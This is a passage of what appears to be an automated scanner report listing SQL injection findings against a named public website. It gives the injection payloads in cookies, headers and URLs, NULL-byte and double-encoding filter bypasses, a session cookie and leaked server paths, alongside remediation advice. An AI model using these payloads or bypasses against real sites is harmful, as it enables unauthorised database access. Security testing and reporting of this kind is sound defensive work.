Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response 2

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:47:10 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 45737

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...

1.58. http://fanpeeps.com/ncaa2.php [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /ncaa2.php

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the __utma cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /ncaa2.php HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2'waitfor%20delay'0%3a0%3a20'--; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:44:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17291

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.59. http://fanpeeps.com/ncaa2.php [__utmz cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /ncaa2.php

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payload '%20and%201%3d1--%20 was submitted in the __utmz cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /ncaa2.php HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)'%20and%201%3d1--%20; PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:44:08 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17272

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.60. http://fanpeeps.com/ncaa2.php [__utmz cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /ncaa2.php

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /ncaa2.php HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)%00'; PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response 1

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:47:07 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17507

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

Request 2

GET /ncaa2.php HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)%00''; PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response 2

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:47:08 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 50565

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...

1.61. http://fanpeeps.com/ncaa2.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /ncaa2.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload waitfor%20delay'0%3a0%3a20'-- was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /ncaa2.php?1waitfor%20delay'0%3a0%3a20'--=1 HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:46:14 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 18110

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.62. http://fanpeeps.com/thumbnailviewer.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /thumbnailviewer.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ')waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /thumbnailviewer.css')waitfor%20delay'0%3a0%3a20'-- HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:46:26 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17397

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.63. http://fanpeeps.com/thumbnailviewer.css [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /thumbnailviewer.css

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /thumbnailviewer.css HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;
Referer: http://www.google.com/search?hl=en&q=%2527

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:46:17 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17370

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

Request 2

GET /thumbnailviewer.css HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;
Referer: http://www.google.com/search?hl=en&q=%2527%2527

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:46:17 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 45737

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...

1.64. http://fanpeeps.com/thumbnailviewer.css [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /thumbnailviewer.css

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the __utma cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /thumbnailviewer.css HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2'waitfor%20delay'0%3a0%3a20'--; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:44:07 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17272

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.65. http://fanpeeps.com/thumbnailviewer.css [__utmb cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /thumbnailviewer.css

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the __utmb cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /thumbnailviewer.css HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380%00';

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:44:43 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17138

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.66. http://fanpeeps.com/thumbnailviewer.css [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /thumbnailviewer.css

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /thumbnailviewer.css HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936'; __utmb=181893936.9.10.1305376380;

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:44:26 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 18102

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

Request 2

GET /thumbnailviewer.css HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936''; __utmb=181893936.9.10.1305376380;

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:44:26 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 45737

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...

1.67. http://fanpeeps.com/thumbnailviewer.css [__utmz cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /thumbnailviewer.css

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payload ',0)waitfor%20delay'0%3a0%3a20'-- was submitted in the __utmz cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /thumbnailviewer.css HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)',0)waitfor%20delay'0%3a0%3a20'--; PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:43:52 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 18100

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.68. http://fanpeeps.com/thumbnailviewer.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /thumbnailviewer.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /thumbnailviewer.js' HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:46:32 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17281

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.69. http://fanpeeps.com/thumbnailviewer.js [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /thumbnailviewer.js

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payload " was submitted in the Referer HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /thumbnailviewer.js HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;
Referer: http://www.google.com/search?hl=en&q="

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:46:32 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17392

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.70. http://fanpeeps.com/thumbnailviewer.js [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /thumbnailviewer.js

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payload '%20and%201%3d1--%20 was submitted in the __utma cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /thumbnailviewer.js HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2'%20and%201%3d1--%20; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:44:10 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17345

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.71. http://fanpeeps.com/thumbnailviewer.js [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /thumbnailviewer.js

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the __utmc cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /thumbnailviewer.js HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936'; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:44:19 GMT
